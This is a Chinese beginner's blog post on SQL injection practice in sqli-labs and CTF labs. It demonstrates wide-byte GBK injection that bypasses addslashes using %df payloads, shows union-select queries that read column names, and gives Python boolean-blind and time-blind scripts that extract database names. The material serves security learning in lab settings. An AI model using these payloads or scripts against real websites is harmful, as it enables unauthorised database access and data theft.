萌新学习sql注入4

最新推荐文章于 2024-08-14 19:01:50 发布
最新推荐文章于 2024-08-14 19:01:50 发布
阅读量187 收藏
点赞数
分类专栏: ctf 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmth666/article/details/104561851
版权

宽字节注入

先列举一下基本的url编码

明文url编码
空格%20
%27
#%23
\%5c

addslashes函数:
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:

  1. 单引号(’)
  2. 双引号(")
  3. 反斜杠(\)
  4. NULL

如何从addslashes函数中逃逸出来:
一:在\前面再加一个 \ (或单数个),变成\\’ ,这样\就被转义了,‘逃出了限制
二:把\弄没,在mysql使用GBK编码的时候,会认为两个字符是一个汉字(前面一个ASCII码要大于128,才到达汉字的范围)
汉字为两个字符
在这里插入图片描述
\'的编码为%5c%27
在这里插入图片描述
我们在 ’ 前加%df后变为%df\’
即为%df%5c%27,进行GBK解码后为
在这里插入图片描述
变为了運’,成功绕过了。

进行实验

实验环境:sqlilabs-less-32
在这里插入图片描述
本地搭建的靶机关于宽字节注入的题莫名其妙不能用了,又到虚拟机搭建了sqli-labs,花了一段时间。哭了
开始进行测试了!!!

?id=1%27--+

在这里插入图片描述
发现是用了addslashes() 函数,使用%df试试

?id=1%df%27--+

在这里插入图片描述
说明是GBK编码,可以注入了。

?id=-1%df%27 union select 1,2,3--+

在这里插入图片描述
用union联合注入即可,后面有一点要注意,就是where table_name=’ '的单引号不能使用,要使用另一种方法:十六进制

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

在这里插入图片描述

脚本编写

学习写python脚本了,sqlmap并不是万能的,学习了一上午,发现requests库的知识太多了,慢慢来吧
实验环境:sqlilabs-less-8
先写最简单的布尔盲注的脚本,首先需要python的requests库,pip下载即可

import requests

dic = 'abcdefghijklmnopqrstuvwsyz'

database = ''

for x in xrange(1,10):
    for i in dic:
        url = "http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),%d,1)='%c'--+" %(x,i)
        try:
            response = requests.get(url,timeout = 5)
            if  response.content.find('You are in...........') != -1:
                database = database + i
                print database
                break
        except Exception,e:
            pass

print database

在这里插入图片描述
最主要的是这个判断,若找到You are in…就不为-1,执行下面语句。若没有找到就为-1,不执行if语句。

if  response.content.find('You are in...........') != -1:

接下来更改url句子即可

url = "http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),%d,1)='%c'--+" %(x,i)

limit 0,1也可用一层循环,我这里就不在演示了。总之python脚本使用起来更加灵活,还是应该好好写一写的。

补充一下时间盲注的脚本: 我当时在做ctfhub时的脚本

# coding:utf-8
import requests
import datetime
import time
# 获取长度
 def database_len():
     for i in range(1, 10):
         url = "http://challenge-658030cd43d1aad1.sandbox.ctfhub.com:10080/"
         payload = "?id=1 and if(length(database())>%d,sleep(3),0)" %i
         # print(url+payload+'%23')
         time1 = datetime.datetime.now()
         r = requests.get(url + payload + '%23')
         time2 = datetime.datetime.now()
         sec = (time2 - time1).seconds
         if sec >= 3:
             print(i)
         else:
             print("no")
             break
     print('database_len:', i)


 database_len()

# 获取数据库名
 def database_name():
     name = ''
     for j in range(1, 9):
              for n in '0123456789abcdefghijklmnopqrstuvwxyz':
             url = "http://challenge-658030cd43d1aad1.sandbox.ctfhub.com:10080/"
             payload = "?id=1 and if(substr(database(),%d,1)='%s',sleep(2),1)" % (j, n)
             # print(url+payload+'%23')
             time1 = datetime.datetime.now()
             r = requests.get(url + payload + '%23')
             time2 = datetime.datetime.now()
             sec = (time2 - time1).seconds
                 if sec >= 2:
                 name += n
                 print(name)
                 break
     print('database_name:', name)


 database_name()
Bmth
关注
专栏目录
MySQL数据库安全加固:防注入与权限管理策略
java专栏
07-01 532
想象一下,你的数据库就像家里的宝贝,里面藏着无数珍贵的数据。想象一下,你正在享受美味的汉堡,突然一只苍蝇飞过来,恶心吧?SQL注入就像那只苍蝇,它会偷偷地混入你的SQL语句里,然后干些坏事,比如删除你的数据或者窃取敏感信息。你的数据库就像一块大大的奶酪,如果权限设置不当,任何人都可以随意拿走。同样,数据库也需要定期备份,这样即使数据丢失,也可以迅速恢复。以上就是我们今天分享的全部内容,如果你想了解更多关于数据库安全的知识,记得关注我们,我们会持续更新有趣又有用的文章。🔥关注墨瑾轩,带你探索编程的奥秘!
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1422
SQLI第四关
SQL注入(四)
weixin_34343000的博客
05-06 87
参数绑定(预编译语句) 虽然数据库自带的过滤是个不错的实现,但是我们还是处在“用户输入被当成 SQL语句的一部分 ”这么个圈子里,其实要跳出这个圈子还有一个实现,就是参数绑定。基本上所有的主流数据库都提供这种接口。这种方法提前预编译了SQL语句的逻辑,然后对 参数预留了位置(就是“ ?1  ?2” 这种的)。这样语句在执行的时候只是按照输入的参数表来执行。 Perl环境的例子: $sth...
SQL注入sqli-labs-master关卡四
m0_65858385的博客
08-09 194
id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+,查询users表中的内容,查看到有username和password我们目标的表。id=-1") union select 1,username,password from users where id=1 --+,查看我们想要看到的账号密码。则步骤与前三关一致,细节上改变即可。
web安全SQL注入---第四章 如何进行SQL注入攻击
weixin_34217773的博客
08-22 116
第四章 如何进行SQL注入攻击1.数字注入2.字符串注入 '# '-- 转载于:https://www.cnblogs.com/Worssmagee1002/p/7412039.html
SQL 联合注入 (injection 第一关)
最新发布
baishiqi12的博客
08-14 603
仅供参考
CTF Web学习(四)----SQL注入
网络猿的博客
01-11 1535
CTF Web学习(四) SQL注入 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 CTF Web学习(三):python脚本的编写及应用 文章目录CTF Web学习(四)前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
sql注入学习总结(仅get)
Mikasa
12-21 527
关于sql注入(仅GET)的一些方法总结 这是萌新第一次写博客,难免有些差错,望各位大佬们指点和矫正233 终于辛苦肝完了sqli-labs(27~28左右还是有点不太清楚,为什么我的%a0就不可以啊啊啊啊啊) 好了,进入正题,接下来分享一下我的个人经验(仅仅涉及GET形式且不涉及过滤) 假如我们现在正在做sqli-labs的题(GET形式),那么该如...
i春秋 从0到1CTFer成长之路-CTF中的SQL-1注入
wh1sper、的博客
03-25 1615
这是本萌新第一次写博客,作为对前面的学习的总结。 如有错误,欢迎各位师傅们指正。 如何判断注入类型我就不做过多的解释,不知道同学请移步去学习(手动狗头)。 CTF中的SQL注入 我采用的是手注 根据经验判断是字符型注入。 接下来就来查看有几列,order by后面依次跟1,2,3,4…当到4时页面查询失败,说明有3列。 http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 %23 http://
SQL守护战:三招打造无懈可击的MySQL,你的数据还怕注入与泄露吗?
java专栏
06-04 653
MySQL安全是一场永无止境的旅途,每一步都是对智慧与耐心的考验。通过上述实践,我们不仅能够抵御SQL注入的黑魔法,堵住数据泄露的暗流,还能铸就坚不可摧的护盾。记住,安全是一个持续的过程,保持警惕,不断学习与实践,你的数据库将如中世纪的城堡,固若金汤,牢不可破。
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第四关Less-4)
u013630181的博客
07-05 178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
SQL注入详解(第四章查询方式及报错)
m0_52051132的博客
09-17 1237
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显得原因可能时SQL语句查询方式问题导致,这个时候我们需要用到报错或者盲注进行后续操作,同时在注入的过程中,提前了解其中SQL语句可以更好的选择对应的注入语句。select 查询数据例如:在网站应用中进行数据显示查询操作。
SQL注入闯关第二关---第四关
qq_54037445的博客
10-06 1535
sqlilab,sql注入闯关第二关到第四关详细讲解
基于Sqli-Labs靶场的SQL注入-1~4关
Joker
11-11 1677
这里对SQL进行了初步的讲解,主要讲解了联合注入以及一些简单的注入类型判断,后续我会更新其他系列的注入方式,例如报错注入、二分法猜解注入、时间延迟注入、导出文件字符型注入、POST类型注入等注入类型。
sqli-labs---第四关
2201_75556700的博客
05-22 359
6、查询用户名和密码字段的值 ,用id分隔开方便观看。4、查询表名(有4张表,我们查询users这张表)3、查询数据库名(库名为security)可判断为字符型闭合,")为闭合方式。2、查询列数,判断回显位置。5、查询users表中字段。id=1'(正常回显)id=1(正常回显)
SQLI-labs-第四关
weixin_54055099的博客
09-04 819
SQLI第四关的思路跟步骤
SQL注入sqli)
qq_43290573的博客
01-14 498
GET 基于报错类型的SQL注入(联合查询一定要报错) users是一个当前数据库中的一个表,但在其他information_schema数据库中,是以 值 的方式出现,这就是为什么information_schema是mysql数据库的总表 判断字段数 1' order by 4 --+ 1' order by 3 --+ 当有4时报错,说明没有4列 查询当前数据库所有表名 0' un...
SQL注入学习指南:Sqli-labs实战教程
"《SQL注入天书》是一本由Lcamry编写的关于MySQL注入技术的学习指南,发布于2016年7月。该文档旨在帮助读者深入了解SQL注入原理、实战技巧以及渗透测试中的相关知识。SQL注入是一种常见的网络安全漏洞,黑客通过构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值